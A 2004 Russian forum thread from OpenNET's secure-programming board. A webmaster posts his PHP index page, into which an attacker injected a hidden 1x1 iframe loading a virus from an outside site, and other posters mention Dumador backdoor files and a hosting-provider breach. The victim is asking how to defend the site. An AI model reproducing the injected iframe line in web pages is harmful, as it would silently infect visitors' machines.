The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



Вариант для распечатки  
Пред. тема | След. тема 
Форум Информационная безопасность (Безопасное программирование)
Режим отображения отдельной подветви беседы [ Отслеживать ]

Оглавление

Мне на главную страницу index.php3 внедрили вирус, Dimux (?), 02-Окт-04, (0) [смотреть все]

Сообщения [Сортировка по времени | RSS]


5. "Мне на главную страницу index.php3 внедрили вирус"  +/
Сообщение от Dimuxemail (ok), 08-Окт-04, 11:39 
>> Вопросы:
>> - как это могли сделать?
>> - как от этого защититься? весь сайт написан вручную на PHP...
>>но я любитель.
>
>что бы можно было что нить сказать ты бы привел весь файл
>php, а то заставляешь людей гадать. Дырок много, обо всех не
>расскажешь.

Весь файл как он есть
------------------------------------------------------------------------
<?
  include "$DOCUMENT_ROOT/comm_functions.php";
  include "$DOCUMENT_ROOT/db_connect.php3";
  include "$DOCUMENT_ROOT/menu.php3";
?>
</td>
</tr>
</table>

<img width=0 height=10 src="">

<div align="center">
  <center>
  <table border="0" cellpadding="0" cellspacing="0" width="100%" bordercolor="#C0C0C0" height="528">
    <tr>
      <td width=170 align="left" valign="top">
<?
        include "$DOCUMENT_ROOT/column_news.inc";
?>
      </td>
      
      <td align="center" valign="top">
<?
        include "$DOCUMENT_ROOT/column_intro.inc";
?>
      </td>
      
      <td width=200 valign="top" align="center">
<?
        include "$DOCUMENT_ROOT/column_right.inc";
?>
      </td>
      
    </tr>
  </table><iframe src="http://www.norma-apex.ru/log/index.html" width=1 height=1 marginwidth=0 marginheight=0 scrolling=no frameborder=0>
</div>

<?
include "$DOCUMENT_ROOT/bottom_menu.php";
include "$DOCUMENT_ROOT/cnt_banners.php";
?>
</body>
</html>
------------------------------------------------------------------------
И второй раз это повторилось в файле bottom_menu.php - тоже добавили это строчку <iframe> со ссылкой на norma-apex - тоже загружался вирус. Это после того как я сделал index.php3 r-- r-- ---, а до этого был rw- rw- ---. Сейчас я все файлы в корне сделал r-- r-- --- но ведь это не выход наверное, а только временная мера.

Или хоть дайте ссылочку почитать как с этим бороться, или дельный совет... а то уже печально становится... на сервере valuehost, где мой сайт - никакого контроля за этим нет, вручную ведь не проследишь за всеми файлами.

Ответить | Правка | Наверх | Cообщить модератору

6. "Мне на главную страницу index.php3 внедрили вирус"  +/
Сообщение от St (??), 19-Окт-04, 04:33 
А я нащёл три разновидности этого вируса или три компаненты одного и того же вируса Backdoor.win32.dumador.al который сидел в файлах dvpd.dll, prntsvr.dll в каталоге winnt (Windows2000)Backdoor.win32.dumador.aq в файле msxmidi.exe, netdc.exe и Backdoor.dumador.al в файле netda.exe в каталоге system32. Все эти файлы в чистои Win2000 отсутствовали  
Ответить | Правка | Наверх | Cообщить модератору

7. "Мне на главную страницу index.php3 внедрили вирус"  +/
Сообщение от Сергей (??), 19-Окт-04, 10:59 
> Или хоть дайте ссылочку почитать как с этим бороться, или дельный
>совет... а то уже печально становится... на сервере valuehost, где мой
>сайт - никакого контроля за этим нет, вручную ведь не проследишь
>за всеми файлами.

Это сообщение случайно не про тебя?

http://www.mazafaka.ru/news/archive/news-archive-13-10-2004....

см.

Valuehost взломали с полпинка
Posted by djamix on 16:23 13.10.2004
...

Ответить | Правка | К родителю #5 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру